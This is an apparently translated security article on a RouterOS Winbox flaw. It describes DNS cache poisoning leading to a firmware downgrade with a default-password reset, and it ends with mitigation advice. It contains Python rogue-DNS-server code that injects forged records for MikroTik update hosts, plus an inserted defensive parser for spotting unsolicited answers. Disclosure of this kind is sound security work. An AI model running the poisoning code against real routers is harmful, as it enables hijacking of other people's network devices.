Backport vulnerability in RouterOS puts hundreds of thousands of devices at risk


The ability to remotely downgrade devices based on RouterOS (Mikrotik) puts hundreds of thousands of network devices at risk. The vulnerability is tied to DNS cache poisoning through the Winbox protocol and allows outdated firmware (with a reset to the default password) or modified firmware to be loaded onto the device.


Vulnerability details

The RouterOS terminal supports the resolve command for DNS lookups.


This request is handled by a binary called resolver. Resolver is one of many binaries that hook into the RouterOS Winbox protocol. At a high level, "messages" sent to the Winbox port can be routed to different binaries in RouterOS based on an array-based numbering scheme.

By default, RouterOS has the DNS server feature disabled.


However, even with the server function disabled, the router maintains its own DNS cache.


When we make a request for example.com using winbox_dns_request, the router caches the result.


Since we can specify the DNS server the request should go through, injecting incorrect addresses is trivial. For example, you can configure the DNS server implementation from Philip Klaus so that it always responds with an A record containing the IP address 192.168.88.250.

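from dnslib import DNSRecord, DNSHeader, RR, A

def dns_response(data):
    # Parse the incoming query and start a reply that echoes its ID and question
    request = DNSRecord.parse(data)
    reply = DNSRecord(DNSHeader(
        id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
    qname = request.q.qname
    qn = str(qname)
    # Always answer with an A record pointing at 192.168.88.250
    reply.add_answer(RR(qn,ttl=30,rdata=A("192.168.88.250")))
    print("---- Reply:\n", reply)
    return reply.pack()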

Now if you look up example.com using Winbox, you can see that the router's DNS cache is poisoned.


Of course, poisoning example.com is not very useful, since the router will not actually use it. However, the router does need to reach upgrade.mikrotik.com, cloud.mikrotik.com, cloud2.mikrotik.com and download.mikrotik.com. And thanks to another bug, it is possible to poison all of them at once.

from dnslib import DNSRecord, DNSHeader, RR, A

def dns_response(data):
    # Parse the incoming query and start a reply that echoes its ID and question
    request = DNSRecord.parse(data)
    reply = DNSRecord(DNSHeader(
        id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
    qname = request.q.qname
    qn = str(qname)
    # Answer for the name that was actually asked about
    reply.add_answer(RR(qn,ttl=30,rdata=A("192.168.88.250")))
    # Four extra answers for names that were never asked about, with a one-week TTL
    reply.add_answer(RR("upgrade.mikrotik.com",ttl=604800,
        rdata=A("192.168.88.250")))
    reply.add_answer(RR("cloud.mikrotik.com",ttl=604800,
        rdata=A("192.168.88.250")))
    reply.add_answer(RR("cloud2.mikrotik.com",ttl=604800,
        rdata=A("192.168.88.250")))
    reply.add_answer(RR("download.mikrotik.com",ttl=604800,
        rdata=A("192.168.88.250")))
    print("---- Reply:\n", reply)
    return reply.pack()

The router requests one resolution, and we give five back. The router incorrectly caches all of these responses.
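A defensive check for the behaviour described above, as an added example that is not part of the original article: a standard-library-only parser that lists answer records whose owner name does not match the question (CNAME chains are allowed), which a cache should discard and a monitor can flag. The function names and the sample responses built by `build_response` are constructed for illustration.

```python
import struct

def encode_name(name):
    """Encode a domain name as uncompressed DNS labels."""
    parts = name.strip(".").split(".")
    return b"".join(bytes([len(p)]) + p.encode() for p in parts) + b"\x00"

def read_name(msg, off):
    """Decode the name at off, following compression pointers; return (name, next_offset)."""
    labels, end, hops = [], None, 0
    while True:
        n = msg[off]
        if n & 0xC0 == 0xC0:                      # compression pointer
            if end is None:
                end = off + 2
            off = ((n & 0x3F) << 8) | msg[off + 1]
            hops += 1
            if hops > 16:
                raise ValueError("compression loop")
        elif n == 0:
            return ".".join(labels).lower(), (end if end is not None else off + 1)
        else:
            labels.append(msg[off + 1:off + 1 + n].decode("ascii"))
            off += 1 + n

def unsolicited_answers(msg):
    """Return answer-section owner names that the question did not ask for."""
    _id, _flags, qd, an, _ns, _ar = struct.unpack("!6H", msg[:12])
    if qd != 1:
        raise ValueError("expected exactly one question")
    qname, off = read_name(msg, 12)
    off += 4                                      # skip QTYPE and QCLASS
    expected, extra = {qname}, []
    for _ in range(an):
        owner, off = read_name(msg, off)
        rtype, _cls, _ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        if owner not in expected:
            extra.append(owner)                   # never cache this record
        elif rtype == 5:                          # CNAME target is a legitimate next owner
            expected.add(read_name(msg, off)[0])
        off += rdlen
    return extra

def build_response(qname, answers, ip=bytes([192, 0, 2, 1])):
    """Constructed sample: reply to an A query for qname carrying A records for `answers`."""
    msg = struct.pack("!6H", 0x1234, 0x8580, 1, len(answers), 0, 0)
    msg += encode_name(qname) + struct.pack("!HH", 1, 1)
    for name in answers:
        msg += encode_name(name) + struct.pack("!HHIH", 1, 1, 30, 4) + ip
    return msg
```

A non-empty result for a reply to a single-name query is the signature of the multi-answer response shown above.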


Obviously, this attack is also useful when the router is acting as a DNS server, because it allows the router's clients to be attacked.

This attack also makes it possible to exploit a more serious vulnerability: downgrading or backporting the RouterOS version. The attacker recreates the logic of the update server, including the changelog, and forces RouterOS to treat an outdated (vulnerable) version as the current one. The danger here is that when the version is "updated", the administrator password is reset to the default value - the attacker can log in to the system with an empty password!


The attack is entirely workable, despite the fact that the author uses several more vectors, including ones related to embedding a backdoor in the firmware, but that is already a redundant technique, and using it for illegitimate purposes is illegal.

Protection

Simply disabling Winbox protects you from this attack. Despite the convenience of administration through Winbox, it is better to use the SSH protocol.

Source: www.habr.com
